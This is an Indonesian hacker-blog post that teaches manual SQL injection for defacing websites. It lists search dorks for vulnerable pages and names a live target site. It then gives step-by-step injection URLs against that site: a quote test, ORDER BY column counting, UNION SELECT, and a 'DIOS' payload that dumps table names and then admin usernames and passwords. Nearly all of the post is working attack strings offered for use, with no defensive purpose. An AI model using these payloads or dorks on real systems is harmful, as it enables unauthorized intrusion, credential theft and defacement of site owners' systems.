asalamualaikum teman teman blik lgi di blog gua,x ini gua ngasih tutor deface poc sql manual,ok langsung ke tutor na
~Dork:
department.asp?dept=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
product_detail.asp?catalogid=
product_detail.cfm?catalogid=
product_list.asp?catalogid=
product_list.cfm?catalogid=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
live target: http://iagcc.com/news.php?id=58
ok kita cek dulu web na vuln aoa ngga nah cara cek na tinggl kasih tanda ' atau lu tambahin %27 nih kek gua
http://iagcc.com/news.php?id=58'
nah vuln mek Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY id DESC' at line 1
ok kyta injek sekrng caranya tambahin order order nya
http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4--(Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)
karena eror nya di angka 7 jadi colomn nya ada 6
sekrng kita kasih union select sesuai column nya
contoh:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--
jangan lupa pake tanda (-)nya
Setelah itu akan muncul angka ajaibnya. Pada web tadi angka ajaibnya ada pada angka 4. Karena angka ajaib ada di angka 4, maka kita akan masukkan diosnya.
Dios:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
gapaham?banyakin lgi coli nya
contoh ni:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--
tuh muncul table admin user sama pasword na,lihat ss
Dios:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
gapaham?banyakin lgi coli nya
contoh ni:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--
tuh muncul table admin user sama pasword na,lihat ss
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--
dan bomm u sama p admin na dapet u know lah
titip nick:MR SPONGEBOB